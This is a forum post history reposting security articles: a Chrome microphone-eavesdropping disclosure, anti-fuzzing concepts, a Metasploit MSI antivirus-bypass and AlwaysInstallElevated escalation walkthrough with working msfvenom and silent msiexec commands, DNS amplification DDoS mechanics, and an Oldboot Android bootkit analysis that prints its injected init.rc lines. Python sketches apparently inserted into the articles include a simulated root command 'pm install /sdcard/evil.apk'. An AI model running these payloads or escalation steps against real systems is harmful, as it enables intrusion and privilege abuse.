Everything posted by Nytro

  1. Chrome Bugs Allow Sites to Listen to Your Private Conversations

By exploiting bugs in Google Chrome, malicious sites can activate your microphone and listen in on anything said around your computer, even after you've left those sites. Even while you are not using your computer, conversations, meetings and phone calls next to it may be recorded and compromised.

While we've all grown accustomed to chatting with Siri, talking to our cars, and soon maybe even asking our glasses for directions, talking to our computers still feels weird. But now Google is putting its full weight behind changing this. There's no clearer evidence of this than visiting Google.com and seeing a speech recognition button right there inside Google's most sacred real estate: the search box. Yet all this effort may now be compromised by a new exploit which lets malicious sites turn Google Chrome into a listening device, one that can record anything said in your office or your home as long as Chrome is still running. Check out the video to see the exploit in action.

Google's Response

I discovered this exploit while working on annyang, a popular JavaScript speech recognition library. My work gave me the insight to find multiple bugs in Chrome and to come up with this exploit, which combines all of them. Wanting speech recognition to succeed, I of course decided to do the right thing: I reported the exploit to Google's security team in private on September 13. By September 19, their engineers had identified the bugs and suggested fixes. On September 24, a patch which fixes the exploit was ready, and three days later my find was nominated for Chromium's Reward Panel (where prizes can go as high as $30,000). Google's engineers, who've proven themselves to be just as talented as I imagined, were able to identify the problem and fix it in less than two weeks from my initial report. I was ecstatic. The system works.
But then time passed, and the fix didn't make it to users' desktops. A month and a half later, I asked the team why the fix wasn't released. Their answer was that there was an ongoing discussion within the Standards group to agree on the correct behaviour: "Nothing is decided yet." As of today, almost four months after learning about this issue, Google is still waiting for the Standards group to agree on the best course of action, and your browser is still vulnerable. By the way, the web's standards organization, the W3C, already defined the correct behaviour which would have prevented this, in its specification for the Web Speech API, back in October 2012.

How Does it Work?

A user visits a site that uses speech recognition to offer some cool new functionality. The site asks the user for permission to use his mic, the user accepts, and can now control the site with his voice. Chrome shows a clear indication in the browser that speech recognition is on, and once the user turns it off or leaves that site, Chrome stops listening. So far, so good.

But what if that site is run by someone with malicious intentions? Most sites using speech recognition choose to use secure HTTPS connections. This doesn't mean the site is safe, just that the owner bought a $5 security certificate. When you grant an HTTPS site permission to use your mic, Chrome will remember your choice and allow the site to start listening in the future without asking for permission again. This is perfectly fine, as long as Chrome gives you a clear indication that you are being listened to, and as long as the site can't start listening to you in background windows that are hidden from you.

When you click the button to start or stop speech recognition on the site, what you won't notice is that the site may have also opened another, hidden popunder window. This window can wait until the main site is closed, and then start listening in without asking for permission.
This can be done in a window that you never saw, never interacted with, and probably didn't even know was there. To make matters worse, even if you do notice that window (which can be disguised as a common banner), Chrome does not show any visual indication that speech recognition is turned on in such windows, only in regular Chrome tabs. You can see the full source code for this exploit on GitHub.

Speech Recognition's Future

Speech recognition has huge potential for launching the web forward. Developers are creating amazing things, making sites better, easier to use, friendlier for people with disabilities, and just plain cool. As the maintainer of a popular speech recognition library, it may seem that I shot myself in the foot by exposing this. But I have no doubt that by exposing it we can ensure these issues are resolved soon, and we can all go back to feeling very silly talking to our computers. A year from now, it will feel as natural as any of the other wonders of this age.

Source: Chrome Bugs Lets Sites Listen to Your Private Conversations
  2. Introduction to Anti-Fuzzing: A Defence in Depth Aid

Thursday January 2, 2014

tl;dr Anti-Fuzzing is a set of concepts and techniques designed to slow down and frustrate threat actors looking to fuzz test software products, by deliberately misbehaving, misdirecting, misinforming and otherwise hindering their efforts. The goal is to drive down the return on investment seen in fuzzing today by making it more expensive in terms of time and effort when used by malicious aggressors.

History of Anti-Fuzzing

Some of the original concepts behind this post were conceived and developed by Aaron Adams and myself whilst at Research In Motion (BlackBerry) circa 2010. The history of Anti-Fuzzing is one of those fortunate accidents that sometimes occur. Whilst at BlackBerry we were looking to do some fuzzing of the legacy USB stack. For whatever reason, the developers had added code so that when the device encountered an unexpected value at a particular location in the USB protocol, it would deliberately catastrophically fail ("catfail" in RIM vernacular). This catfail would look to the uninitiated like the device had crashed, and thus you would likely be inclined to investigate further to understand why. Ultimately you'd realise it was deliberate, and then come to the conclusion that you had wasted time debugging the issue. After realising that wasting cycles in this manner could be an effective and demoralising defensive technique to frustrate and hinder aggressors, the concept of Anti-Fuzzing was born. Over the following years I fielded questions from at least three researchers who believed they may have found a security issue in the product's USB stack, when in fact they had simply tripped over this intended behaviour.

There is prior art in this space: industry luminaries Haroon Meer and Roelof Temmingh explored related ideas in their seminal 2004 paper When the Tables Turn.
In January 2013, a blog post titled Advanced Persistent Trolling by Francesco Manzoni discussed an Anti-Fuzzing concept specifically designed to frustrate penetration testers during web application assessments. This is obviously not something I condone, but it introduced some similar techniques and concepts in the context of web applications specifically.

Anti-Tamper: an Introduction

Before we get onto Anti-Fuzzing, it's worth understanding what Anti-Tamper is, as it heavily influenced the early formation of the idea. In short, Anti-Tamper is a US Department of Defense concept that is summarised (overview presentation) as follows:

Anti-Tamper (AT) encompasses the systems engineering activities intended to prevent and/or delay exploitation of critical technologies in U.S. weapon systems. These activities involve the entire life-cycle of systems acquisition, including research, design, development, implementation, and testing of AT measures. Properly employed, AT will add longevity to a critical technology by deterring efforts to reverse-engineer, exploit, or develop countermeasures against a system or system component. AT is not intended to completely defeat such hostile attempts, but it should discourage exploitation or reverse-engineering or make such efforts so time-consuming, difficult, and expensive that even if successful, a critical technology will have been replaced by its next-generation version.

These goals can equally apply to fuzzing.

Anti-Fuzzing: a Summary

If we take the Anti-Tamper mission statement and adjust the language for Anti-Fuzzing, we arrive at something akin to:

Anti-Fuzzing (AF) encompasses the systems engineering activities intended to prevent and/or delay fuzzing of software. Properly employed, AF will add longevity to the security of a technology by deterring efforts to fuzz and thus find vulnerabilities via this method against a system or system component.
AF is not intended to completely defeat such hostile attempts, but it should discourage fuzzing or make such efforts so time-consuming, difficult, and expensive that even if successful, a critical technology will have been replaced by its next-generation version with improved mitigations.

Now these are lofty goals for sure, but as you'll see we can go some way towards meeting them using a variety of different approaches. As with Anti-Tamper, Anti-Fuzzing is intended to:

Deter: the threat actor's willingness or ability to fuzz effectively (i.e. have the aggressor pick an easier target).
Detect: fuzzing, and respond accordingly in a defensive manner.
Prevent or degrade: the threat actor's ability to succeed in their fuzzing mission.

Full article: https://www.nccgroup.com/en/blog/2014/01/introduction-to-anti-fuzzing-a-defence-in-depth-aid/
  3. Bypassing Anti-Virus with Metasploit MSI Files

1/20/2014 | NetsPWN

A while back I put together a short blog titled 10 Evil User Tricks for Bypassing Anti-Virus. The goal was to highlight common anti-virus misconfigurations. While I was chatting with Mark Beard he mentioned that I neglected to include how to use Metasploit payloads packaged in MSI files. So in this blog I'll try to make amends by providing a quick and dirty walkthrough of how to do that. This should be useful for both sysadmins and penetration testers.

Creating MSI Files that Run Metasploit Payloads

The Metasploit Framework team (and the greater security community) has made it easy and fun to package Metasploit payloads in almost any file format. Thankfully that includes MSI files. MSI files are Windows installation packages commonly used to deploy software via GPO and other methods. Luckily for penetration testers, some anti-virus solutions aren't configured by default to scan .msi files or the .tmp files that are generated when MSI files are executed. For those of you who are interested in testing whether your anti-virus solution stops Metasploit payloads packaged in .msi files, I worked with Mark to put together this short procedure.

Use the msfconsole to create an MSI file that will execute a Metasploit payload. Feel free to choose your favorite payload, but I chose adduser because it makes for an easy test. Note: this payload requires local admin privileges to add the user.

msfconsole
use payload/windows/adduser
set PASS Attacker123!
set USER Attacker
generate -t msi -f /tmp/evil.msi

Alternatively, you can generate the MSI file with the msfvenom ruby script that comes with Metasploit:

msfvenom -p windows/adduser USER=Attacker PASS=Attacker123! -f msi > evil.msi

Copy the evil.msi file to the target system and run the MSI installation from the command line to execute the Metasploit payload.
From a penetration test perspective, using the /quiet switch is handy because it suppresses messages that would normally be displayed to the user:

msiexec /quiet /qn /I c:\temp\evil.msi

Check the anti-virus logs to see if the payload was identified. You can also check whether the payload executed and added the "Attacker" user with the command below. If user information is returned, then the payload executed successfully.

net user attacker

The MSI file is configured to execute the payload but will not complete the formal installation process, because the authors (Ben Campbell and Parvez Anwar) forced it to fail using some invalid VBS, so uninstalling it won't be required after execution. However, during execution a randomly named .tmp file that contains the MSF payload will be created in the c:\windows\Installer\ folder. The file should be cleaned up automatically, but if the installation fails out for any reason the file will most likely need to be removed manually. The file will look something like "c:\windows\Installer\MSI5D2F.tmp". As a side note, it appears that the .tmp file is basically a renamed .exe file, so if you manually rename the .tmp file to an .exe file you can execute it directly. Also, once it's renamed to an .exe file, anti-virus starts to pick it up.

Escalating Privileges with MSI Packages

As it turns out, MSI files are handy for more than simply avoiding anti-virus. Parvez Anwar figured out that they can also be used to escalate privileges from local user to local administrator if the group policy setting "Always install with elevated privileges" is enabled for both the computer and user configurations. The setting is exactly what it sounds like: it provides users with the ability to install any horrible ad-ware, pron-ware, or malware they want onto corporate systems.
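The escalation only works when "Always install with elevated privileges" is enabled in both the per-user and the per-machine policy. A minimal sketch of that decision logic (pure Python, with the two registry values passed in as arguments rather than read live via winreg, so it runs anywhere):

```python
def always_install_elevated(hkcu_value, hklm_value):
    """AlwaysInstallElevated escalation is possible only when BOTH the
    HKCU and the HKLM policy values are set to 1 (REG_DWORD)."""
    return hkcu_value == 1 and hklm_value == 1

# Enabled machine-wide but not for the user: not exploitable.
print(always_install_elevated(0, 1))
```

On a real target, the two input values would come from the registry locations shown below.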
In gpedit.msc the configuration looks something like this:

The policies can also be viewed or modified from the following registry locations:

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001

For those of you who don't want to go through the hassle of generating and executing the MSI files manually, Ben Campbell (meatballs) and Parvez Anwar were nice enough to put together a Metasploit module to do it for you, called "Windows AlwaysInstallElevated MSI". The technique was also mentioned during a recent presentation by Rob Fuller (mubix) and Chris Gates (carnal0wnage) titled "AT is the new BLACK", which is worth checking out.

Wrap Up

The downside is that MSI files can pose a serious threat if anti-virus and group policy settings are not configured securely. However, the bright side is that it's an easy problem to fix in most environments. Good hunting, and don't forget to Hack Responsibly!

References

Windows Installer Package: http://msdn.microsoft.com/en-us/library/aa244642(v=vs.60).aspx
Advanced Installer - Download
rewt dance: Metasploit MSI Payload Generation
Abusing MSI's elevated privileges | GreyHatHacker.NET

Source: https://www.netspi.com/blog/entryid/212/bypassing-anti-virus-with-metasploit-msi-files
  4. idb

idb is a tool to simplify some common tasks for iOS pentesting and research. It is still a work in progress but already provides a bunch of (hopefully) useful commands. The goal was to provide all (or most) functionality for both iDevices and the iOS simulator. For this, a lot is abstracted internally to make it work transparently in both environments, although recently the focus has been more on supporting devices. idb was released as part of a talk at ShmooCon 2014. The slides of the talk are up on Speakerdeck. There is also a blog post on my personal website that I will update with the video of the talk once it is available.

Getting Started

Visit the getting started guide on the wiki. Bug reports, feature requests, and contributions are more than welcome!

Command-Line Version

idb started out as a command line tool which is still accessible through the cli branch. Find the getting started guide and some more documentation in the wiki.

idb Features

Simplified pentesting setup
  • Setup port forwarding
  • Certificate management
iOS log viewer
Screenshot utility
  • Simplifies testing for the creation of backgrounding screenshots
App-related functions
  • Download the app binary
  • List imported libraries
  • Check for encryption, ASLR, stack canaries
  • Decrypt and download an app binary (requires dumpdecrypted)
  • Launch an app
  • View app details such as name, bundle ID, and Info.plist file
Inter-Process Communication: URL handlers
  • List URL handlers
  • Invoke and fuzz URL handlers
Pasteboard monitor
Analyze local file storage
  • Search for, download, and view plist files
  • Search for, download, and view sqlite databases
  • Search for, download, and view local caches (Cache.db)
  • File system browser
Install utilities on iDevices
  • Install iOS SSL Kill Switch
  • Alpha: compile and install dumpdecrypted
Alpha: Cycript console
Snoop-It integration

Source: https://github.com/dmayer/idb
  5. Anatomy of a DNS DDoS Amplification Attack

by David Piscitello, ICANN SSAC Fellow

Over the past several months, a series of Distributed Denial of Service (DDoS) attacks victimized DNS root and Top Level Domain (TLD) name server operators. These attacks merit careful analysis because they combine several attack tools and methods to increase their effectiveness. The attacks also call attention to an operational problem that was solved long ago, yet most IT administrators have not adopted the answer.

The attacker's toolkit

The attacks observed against root and TLD name servers are variants of a DNS amplification attack and use the following tools:

System compromise. An attacker doesn't want to use his own system to attack other systems and risk discovery, so he launches the attack from systems on which he has gained unauthorized administrative control. There are many ways to gain control of systems. One method uses a mass email worm to infect a large number of systems. When the worm infects a system, it installs a remote software agent, or zombie, that the attacker can remotely control and direct to initiate a DoS attack.

Distributing the DoS attack sources. In the attacks observed, the attacker's goal is to saturate the targeted name server operator's communications infrastructure rather than the name servers themselves. Name server operators typically have large access circuits, so launching an attack from a single source is unlikely to accomplish this goal. But by amassing a veritable army of attack sources, the attacker can fill even Gigabit-per-second access circuits. Botnets, collections of zombie hosts the attacker "owns," commonly serve as the attacker's army.

Amplification. Attackers use amplification to increase the traffic volume in an attack. In the DNS attacks, the attacker uses an extension to the DNS protocol (EDNS0) that enables large DNS messages.
The attacker composes a DNS request message of approximately 60 bytes to trigger delivery of a response message of approximately 4000 bytes to the target. The resulting amplification factor, approximately 70:1, significantly increases the volume of traffic the target receives, accelerating the rate at which the target's resources will be depleted.

DNS data corruption. To achieve the amplification effect, the attacker issues a DNS request that he knows will evoke a very large response. There are many ways for the attacker to know in advance which DNS resource record to request. For this article, we'll choose one and assume that the attacker has previously compromised a poorly configured name server and has modified this server's zone file to include a DNS TXT resource record of approximately 4000 bytes to serve as the amplification resource record.

Impersonation. In the DNS attacks, each attacking host uses the targeted name server's IP address as its source IP address rather than its own. The effect of spoofing IP addresses in this manner is that responses to DNS requests will be returned to the target rather than to the spoofing hosts.

Exploitable name service operation. The DNS attacks exploit name servers that allow open recursion. Recursion is a method of processing a DNS request in which a name server performs the request for a client by asking the authoritative name server for the name record. Recursion is not inherently bad; however, it should only be provided for a trusted set of clients. Name servers that perform (open) recursion for any host provide attackers with an easily exploitable vector.

The Attack

Now that you are familiar with the attack elements, let's look at how the attack is performed. The attacker recruits his army of attack sources (the botnet). He writes the large amplification record (e.g., a 4000-byte DNS TXT resource record) into the zone file of the name server he has compromised.
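Before following the attack steps further, the amplification arithmetic above is easy to check concretely. The sketch below builds a minimal EDNS0 TXT query with Python's struct module (the query name txt.example.com is a hypothetical stand-in for wherever the attacker's amplification record lives); the DNS payload comes to roughly 44 bytes, and once IP and UDP headers are added, the on-wire request lands in the neighborhood of the ~60 bytes cited above, yielding roughly the 70:1 ratio against a 4000-byte response:

```python
import struct

def build_edns0_txt_query(name, payload_size=4096):
    """Build a minimal DNS TXT query carrying an EDNS0 OPT record
    that advertises a large (4096-byte) UDP payload size."""
    # Header: ID, flags (RD set), QDCOUNT=1, ANCOUNT=0, NSCOUNT=0, ARCOUNT=1
    header = struct.pack(">HHHHHH", 0x1234, 0x0100, 1, 0, 0, 1)
    # QNAME as length-prefixed labels, terminated by a zero byte
    qname = b"".join(
        bytes([len(label)]) + label.encode() for label in name.split(".")
    ) + b"\x00"
    question = qname + struct.pack(">HH", 16, 1)  # QTYPE=TXT, QCLASS=IN
    # OPT pseudo-RR: root name, TYPE=41, CLASS=payload size, TTL=0, RDLEN=0
    opt = b"\x00" + struct.pack(">HHIH", 41, payload_size, 0, 0)
    return header + question + opt

query = build_edns0_txt_query("txt.example.com")
print(len(query), round(4000 / len(query)))  # query size and rough amplification
```

This is illustrative only; it builds the packet bytes and never sends them.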
He tests for and compiles a list of open recursive name servers that will query the compromised name server on behalf of the spoofing hosts. (More than one million insecurely configured name servers worldwide provide open recursion, so this is quite an easy list to compile.) With these elements in place, the attacker commands his army to attack a targeted name server via the open recursive servers.

Suppose the attacker targets a name server at the IP address 10.10.1.1. At the attacker's signal, all the zombies in his botnet issue DNS request messages asking for the amplification record through the open recursive servers (see diagram). The botnet hosts spoof the targeted name server by writing 10.10.1.1 in the source IP address field of the IP packets containing their DNS request messages. The open recursive name servers accept the DNS request messages from the botnet hosts. If the open recursive name servers have not received a request for this record before, and do not already hold the amplification record in their cache, they issue a DNS request message of their own to the compromised name server to retrieve it, and the compromised name server returns the amplification record to the open recursive servers.

The open recursive servers compose DNS response messages containing the amplification record and return these to the systems that originated the request. The open recursive servers believe they are sending DNS response messages to the botnet hosts that made the initial query, when in fact IP spoofing causes the responses to be forwarded to the target name server at 10.10.1.1. The targeted name server at 10.10.1.1 never issued any DNS request messages but is now bombarded with responses. The responses contain a 4000-byte DNS TXT record. A message of this size exceeds the maximum (Ethernet) transmission unit, so it is broken into multiple IP packet fragments.
This forces reassembly at the destination, which increases the processing load at the target and enhances the deception: because the response spans several IP fragments, and only the first fragment contains the UDP header, the target may not immediately recognize that the attack is DNS-based.

This DDoS attack is most effective when launched via a large number of open recursive servers. Distribution increases the traffic and decreases the focus on the sources of the attack. The impact on the misused open recursive servers is generally low, so the attack generally goes undetected. The effect on the target, however, can be severe. Attacks based on this method have achieved a bandwidth consumption rate exceeding seven (7) Gigabits per second.

Surviving (if you are the target)

There are several measures you can take to diminish the effects of this DDoS attack. The source IP addresses are not spoofed in the IP packets carrying the DNS response messages, so the source addresses identify the open recursive servers the zombies use. Depending on the severity of the attack and how strongly you wish to respond, you can rate-limit traffic from these source IP addresses or use a filtering rule that drops DNS response messages that are suspiciously large (over 512 bytes). In the extreme, you may choose to block traffic from the open recursive servers entirely. These efforts do not squelch the attack sources, and they do not reduce the load on networks and switches between your name server and the open recursive servers. Note that if you block all traffic from these open recursive servers you may interfere with legitimate attempts to resolve names through them; for example, some organizations run open recursive servers so that mobile employees can resolve from a "trusted" name server, so such users can be affected.

What can you do to reduce the threat? We know the tools attackers use, so we need to prevent them from assembling their toolkit. Two countermeasures are obvious.
Securely configure client systems and use antivirus protection so that the attacker is unable to recruit his botnet army. Securely configure name servers to reduce the attacker's ability to corrupt a zone file with the amplification record. Disable open recursion on your name servers and only accept recursive DNS queries from trusted sources. This measure will greatly reduce the attack vectors. It is a relatively simple configuration change on common DNS application services such as Windows 2003 Server and BIND. If you are using an external DNS name server, test to see if it is offering open recursion; if it is, contact your ISP or DNS provider and suggest they close this security loophole.

Even when used in combination, these measures cannot have the same mitigating effect as source IP address validation. By performing source IP address validation, you can effectively prevent the impersonation attack: the botnet hosts can't generate DNS request messages posing as the targeted name server, which stems the attack at the outset. If you run an Internet firewall or a router that supports access control lists, modify your egress traffic filtering policy to only allow IP packets to exit your network if they contain source IP addresses assigned from the subnets you use internally.

Source IP address validation is not widely implemented, despite repeated encouragement to do so by security experts and advisory groups such as SANS, CERT, and ICANN's Security and Stability Advisory Committee (SSAC). Critics of source IP address validation claim that implementation adds administrative overhead and adversely impacts performance. But sustained DDoS attacks against root and TLD name servers have potentially graver consequences, and the frequency and effectiveness of DDoS attacks is only increasing while we continue to ignore this much-needed security measure. Telecommunications networks have been validating telephone numbers and addresses on ingress traffic for decades.
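The egress filtering policy described above reduces to a simple membership test on the source address. A minimal sketch using Python's ipaddress module (the internal subnets below are illustrative placeholders; a real deployment would use its own assigned ranges, and would enforce this in a router ACL or firewall rather than in software):

```python
import ipaddress

# Hypothetical example: the subnets this network actually uses internally.
INTERNAL_SUBNETS = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
]

def egress_allowed(src_ip):
    """Permit an outbound packet only when its source address belongs to
    an internal subnet; spoofed sources (e.g. the DNS target's address)
    are dropped at the network edge."""
    addr = ipaddress.ip_address(src_ip)
    return any(addr in net for net in INTERNAL_SUBNETS)

print(egress_allowed("192.0.2.10"))  # legitimate internal source
print(egress_allowed("10.10.1.1"))   # spoofed target address from the article
```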
It's time for IP networks to do the same.

Source: Anatomy of a DNS DDoS Amplification Attack | WatchGuard
  6. [h=1]Oldboot: the first bootkit on Android[/h]

Zihang Xiao, Qing Dong, Hao Zhang and Xuxian Jiang
Qihoo 360 Technology Co. Ltd. (NYSE: QIHU)
Jan 17, 2014

A few days ago, we found an Android Trojan that uses a brand new method to modify a device's boot partition and booting script file, so that it can launch a system service and extract a malicious application during the early stage of the system's boot. Due to the special RAM disk feature of Android devices' boot partition, no current mobile antivirus product in the world can completely remove this Trojan or effectively repair the system. We named this Android Trojan family Oldboot. As far as we know, this is the first bootkit found on the Android platform in the wild. According to our statistics, as of today, more than 500,000 Android devices have been infected by this bootkit in China in the last six months. We've released a new security tool (download) which can accurately detect and remove it.

[h=2]Construction and behaviors of Oldboot[/h]

When an Android device is infected by Oldboot, its user will find new applications containing lots of advertisements frequently being installed on the system. In the installed applications list, the user will find a system application named GoogleKernel which can't be uninstalled manually. Antivirus products, such as 360 Mobile Security, classify this application as malware (Figure 1). However, after removing it and rebooting the device, the two previous phenomena will occur again.
Oldboot consists of four executable or configuration files:

/init.rc, the configuration script for the Android system's boot, which has been modified by Oldboot
/sbin/imei_chk, an ELF executable file for the ARM architecture
/system/app/GoogleKernel.apk, an Android application which is installed as a system application
/system/lib/libgooglekernel.so, the native library used by GoogleKernel

Figure 1 Antivirus product classifies GoogleKernel as malware

These four files have a complex calling relationship (Figure 2): When the Android system boots, it reads init.rc, launches imei_chk as a system service and opens the related local socket. imei_chk then extracts libgooglekernel.so into /system/lib and GoogleKernel.apk into /system/app. After the system's boot has finished, GoogleKernel.apk is installed as a system application; it periodically executes native code in libgooglekernel.so to trigger malicious behaviors. libgooglekernel.so generates configurations or malicious commands and passes them to Java code in GoogleKernel.apk, which sends them to imei_chk through the socket. These commands are finally executed by imei_chk.

Figure 2 Components of Oldboot and their relationship

Below is a more detailed analysis of these files. At the tail of init.rc's content, we found these lines:

service imei_chk /sbin/imei_chk
    class core
    socket imei_chk stream 666

According to this, when the Android system boots, the init process will launch a new system service named imei_chk with root permission, and will create a local socket with the same name.
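The init.rc fragment above is simple enough to parse mechanically. A small illustrative sketch (not a tool from the article) that extracts the service name, binary and options from such a fragment:

```python
def parse_init_services(text):
    """Parse service blocks from an Android init.rc fragment into a dict
    mapping service name -> {"binary": ..., "options": [...]}."""
    services = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("service "):
            parts = line.split()
            current = {"binary": parts[2], "options": []}
            services[parts[1]] = current
        elif line and current is not None:
            current["options"].append(line)
    return services

# The lines Oldboot appends to /init.rc:
oldboot_rc = """
service imei_chk /sbin/imei_chk
    class core
    socket imei_chk stream 666
"""
print(parse_init_services(oldboot_rc))
```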
Before creating the socket and listening, imei_chk executes some code which reads two data blocks from its read-only data segment and extracts them to these two files (Figure 3):

/system/lib/libgooglekernel.so
/system/app/GoogleKernel.apk

Figure 3 The imei_chk extracts so and APK files

On the other side, imei_chk creates a socket to receive all incoming data. This data is parsed into Linux system commands which are finally executed with root permission (Figure 4).

Figure 4 The imei_chk receives commands and executes them

On the infected device, we found the imei_chk socket running with root permission and listening for data from any other process. Please note that the access mode of this socket device is 666, with the setuid flag (Figure 5). This world-writable property leads to a serious security vulnerability: on infected devices, any other application can send this socket device Linux commands, which will later be executed with root permission.

Figure 5 The imei_chk socket device can be written by any process

When the Android system boots, it checks whether all APK files under /system/app are installed. If not, it installs them as system applications (so-called pre-installed applications). Thus, GoogleKernel.apk will be installed as a system application, while libgooglekernel.so, the native library it relies on, has already been extracted to the correct place. When removing normal Android malware, all previous Android antivirus products only uninstall and delete the malicious APK and so files. Thus, when the device reboots, the undeleted imei_chk will extract GoogleKernel.apk again. In fact, these antivirus products not only won't, but also can't, effectively remove imei_chk. We'll discuss this later. Let's have a deeper look into GoogleKernel.apk.
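Before looking at the APK, the world-writable socket deserves a concrete illustration: because its mode is 666, any local process can connect and push a string that imei_chk will run as root. The simulation below uses an in-process socketpair as a stand-in for the real socket device (an assumption for illustration only; the actual device path and wire protocol are not shown in the article):

```python
import socket

def send_command(sock, command):
    """What any unprivileged app could do: write a command to the socket."""
    sock.sendall(command.encode())

def receive_command(sock, bufsize=4096):
    """What the root-privileged imei_chk side does: read the raw data,
    which it would then execute as a Linux command."""
    return sock.recv(bufsize).decode()

# Simulate the channel with a connected socket pair.
app_side, imei_chk_side = socket.socketpair()
send_command(app_side, "pm install /sdcard/evil.apk")
cmd = receive_command(imei_chk_side)
print(cmd)
```

The point of the sketch is the trust model, not the mechanics: nothing on the receiving side authenticates the sender.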
GoogleKernel.apk declares many system-level or dangerous-level permissions in its AndroidManifest.xml, and specifies that it runs as the system user:

<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
<uses-permission android:name="android.permission.INSTALL_PACKAGES" />
<uses-permission android:name="android.permission.DELETE_PACKAGES" />
<uses-permission android:name="android.permission.CLEAR_APP_USER_DATA" />
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
……
<application android:allowBackup="true" android:allowClearUserData="false" android:killAfterRestore="false" android:label="GoogleKernel" android:persistent="true" android:process="system">

The application has only one service, named Dalvik, and two receivers, named BootRecv and EventsRecv, without any activity or user interface. Its main behaviors include collecting system information, changing network settings, and periodically triggering other malicious behaviors such as:

Connecting to its C&C server (Figure 6) to download a configuration file;
Connecting to its C&C server to fetch system commands and executing them with root permission;
Downloading APK files (Figure 7) and installing them as system applications (Figure 8);
Uninstalling specified system applications.

From some unfinished functions' names, it seems that the author of Oldboot was planning to implement sending SMS to any specified phone number (Figure 9).

Figure 6 The libgooglekernel.so stores C&C servers' URL in its global config
Figure 7 The libgooglekernel.so downloads APK files and installs them
Figure 8 The downloaded APK files are installed as system applications
Figure 9 The libgooglekernel.so tries to send SMS, but the related Java code isn't finished

The author of Oldboot intentionally designed the implementation of the malicious behaviors.
All main malicious behaviors are split into several execution phases implemented in different components: GoogleKernel.apk periodically activates itself and calls JNI interfaces of the so file to trigger malicious behaviors (Phase 1). If the behavior is to connect to the C&C servers, the so file constructs the servers' URLs and calls Java code in the APK file through JNI again (Phase 2). The APK file starts an HTTP connection to the servers and returns the response to the so file (Phase 3). The so file then parses the response format to get commands, configuration or data (Phase 4). If the behavior is to install APK files or to uninstall a system application, then after downloading the APK files through the above phases, the so file constructs system commands (including remounting the system partition and pm install/uninstall) for the installation or uninstallation and passes them to the APK file through JNI (Phase 5). The APK file sends these commands to the imei_chk service through a local socket (Phase 6, see Figure 10 and Figure 11). At last, imei_chk executes these commands with root permission (Phase 7). Figure 10 The GoogleKernel.apk initializes connection with local socket imei_chk Figure 11 The GoogleKernel.apk sends system commands to the socket [h=2]New infection methods[/h] Unlike previous Android malware, the main specialty of Oldboot is its modification of the init.rc file and the /sbin directory. In Android, the root directory and the /sbin directory are located in the RAM disk, which is loaded from the boot partition of the device's disk. This RAM disk is a read-only, in-memory file system, and any runtime change to it is never physically written back to the disk. Thus, while the system is running, even if we remount the partition as writable and delete some files in these directories, the deletions won't really be applied to the disk. After the device reboots, these files will appear again.
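A forensic check for this kind of init.rc tampering could unpack the boot image's ramdisk and flag service entries pointing at unexpected binaries. Below is a rough Python sketch; the whitelist of known service paths is hypothetical and would have to be rebuilt per-firmware from a clean image:

```python
import re

# Hypothetical whitelist of service binaries expected in this ROM's
# init.rc; in practice it would come from a known-clean boot image.
KNOWN_SERVICE_PATHS = {"/sbin/ueventd", "/sbin/adbd", "/sbin/healthd"}

def suspicious_services(init_rc_text):
    """Return (name, path) for every 'service' entry whose binary is
    not in the expected set -- e.g. the injected /sbin/imei_chk."""
    hits = []
    for m in re.finditer(r"^service\s+(\S+)\s+(\S+)", init_rc_text, re.M):
        name, path = m.group(1), m.group(2)
        if path not in KNOWN_SERVICE_PATHS:
            hits.append((name, path))
    return hits

sample_init_rc = """\
service ueventd /sbin/ueventd
    critical

service imei_chk /sbin/imei_chk
    class core
"""
hits = suspicious_services(sample_init_rc)
```

Note that such a scan has to run against the extracted boot image, not the live file system, precisely because of the RAM disk behavior described above.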
Previous Android malware, such as DroidKungfu, may extract malicious files to the /system partition. But the /system partition doesn't have the above property, which means there is no technical difficulty in either the malware's file writing or the antivirus' file deletion. When facing Oldboot, however, even if antivirus products know that imei_chk is malicious and needs to be deleted, they can't completely delete it with the traditional method, since the "remount" approach only deletes the in-memory copy of /sbin/imei_chk and doesn't affect the disk partition. The question is, how did the attacker put imei_chk into the /sbin directory and successfully modify the init.rc script? We believe there are at least two ways to achieve it: The attacker had a chance to physically access the devices and flash a malicious boot.img image to the boot partition of the disk; While the system was running, after gaining root permission, the attacker forcibly wrote malicious files into the boot partition through the dd utility. In Oldboot's case, we are more inclined to believe that the attacker chose the first way (though we can't exclude the possibility of the second one), for these reasons: Firstly, we found that the infected device was bought from a big IT mall in Zhongguancun, the biggest and most famous consumer electronics distribution center in Beijing. In the past, we have found retailers there flashing malware-laden system images onto the mobile phones and tablets they sell. Secondly, the infected device (a Galaxy Note II) contains Samsung's stock system; all normal system applications in it have Samsung's official signature. However, the recovery partition has been replaced by a third-party recovery ROM, and the timestamps of all files in the boot partition are identical (2013-05-08 17:22). Thirdly, based on Qihoo's cloud security technology, we counted the models of all known infected devices. More than half of them are not well-known popular models.
If the attacker had used the second way to infect devices remotely, the targets would be random and outside the attacker's control, and should therefore be distributed much closer to the real market distribution of Android devices. [h=2]Related samples[/h] The APK file extracted by Oldboot uses a self-signed certificate. We found two other malware samples that use the same certificate. The first disguises itself as a normal security application. It dynamically registers a ContentObserver to observe any changes to the SMS inbox. Every time a new SMS arrives, it checks whether its content contains words such as "QQ number" or "password" in Chinese (Figure 12). If such words exist, it deletes the SMS and uploads its content to specified servers. In the past, Tencent provided a service to recover QQ passwords via SMS, so this malware could steal users' QQ accounts at that time. This malware also uses receivers and a service with the same names as those in Oldboot's APK file. Figure 12 The Oldboot’s related sample will steal QQ’s password The second related sample was named GoogleDalvik. Its code structure, including the JNI interfaces and entry classes, is almost identical to Oldboot's. The only difference between GoogleDalvik and GoogleKernel.apk is that the former doesn't communicate with imei_chk through the socket; to install or uninstall system applications, it just executes commands in its Java code (Figure 13). Figure 13 The only difference between Oldboot and its previous version We believe GoogleDalvik is an earlier version of Oldboot, a version without the bootkit component. GoogleDalvik and Oldboot both use domains such as androld666.com and androld999.com as their C&C servers' URLs, which is the main reason we named this family Oldboot. [h=2]Solutions[/h] We have now released the first dedicated security tool for 